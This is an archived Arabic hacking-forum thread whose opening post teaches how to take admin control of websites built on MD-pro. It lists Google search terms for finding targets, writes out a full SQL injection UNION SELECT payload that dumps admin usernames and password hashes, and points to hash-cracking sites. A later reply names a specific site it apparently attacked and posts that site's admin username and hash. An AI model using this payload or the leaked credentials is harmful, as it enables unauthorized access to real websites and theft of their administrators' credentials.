:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   الان أدخل كأدمن على مواقع "powered by MD-pro " (http://www.vbspiders.com/vb/t2505.html)

PiNki 08-23-2008 02:23 AM
الان أدخل كأدمن على مواقع "powered by MD-pro "
 
السلام عليكم

هناك طريقه سهله جدا للدخول
كأدمن في المواقع...



1-الخطوة الأولى : نذهب إلى google,yahoo و نضع
كود PHP:
"powered by md-pro"
ثم بحث.

http://www.monsterup.com/upload/1206890743.jpg


2-الخطوة الثانية : إختر موقعا "يجب البحث على الموقع المناسب و هناك العديد"
كيف نعرف أن هذا الموقع مناسب?
نفتح أي موقع و نضيف هذه العبارة :


كود PHP:
/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*


و يجب الحصول على مثل هذه النتيجة
http://www.monsterup.com/upload/1206889131.jpg


.و كما ترون
.admin=stefan
7aa9f13ab4cb39975b22d7d9cbe456fa=password
هناك العديد من الطرق لفك مثل هذه الرموز md5

http://www.monsterup.com/upload/1206890610.jpg


إضغط هنا


http://gdataonline.com/seekhash.php

او
http://www.milw0rm.com/



الأن لديك كل ما يلزمك لدخول كأدمن!!!


كود:

http://www.[sitename].com/index.php?...iew&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

والثغرة sql injection



بالموفقيه اخواااني ..

PASSEWORD 08-23-2008 11:12 AM
مشكور اخي الكريم

MATRIX ALGERIA 01-05-2010 11:47 PM
مشكور اخي وهاذا تطبيق على الثغرة
الموقع http://www.enerb.it/
الاسم admin
الباس 3dc0b0262e0c955c4e1782b6a74fa16c
لم اقم بفك الهاش خخخخ

p4w 01-09-2010 09:34 PM
[gdwl][align=center]مشكور يا اخي شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . [/align][/gdwl]

hank00sh 09-14-2011 08:33 PM
رد: الان أدخل كأدمن على مواقع "powered by MD-pro "
 
مشكور اخي

تقبل مروري


الساعة الآن 11:48 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0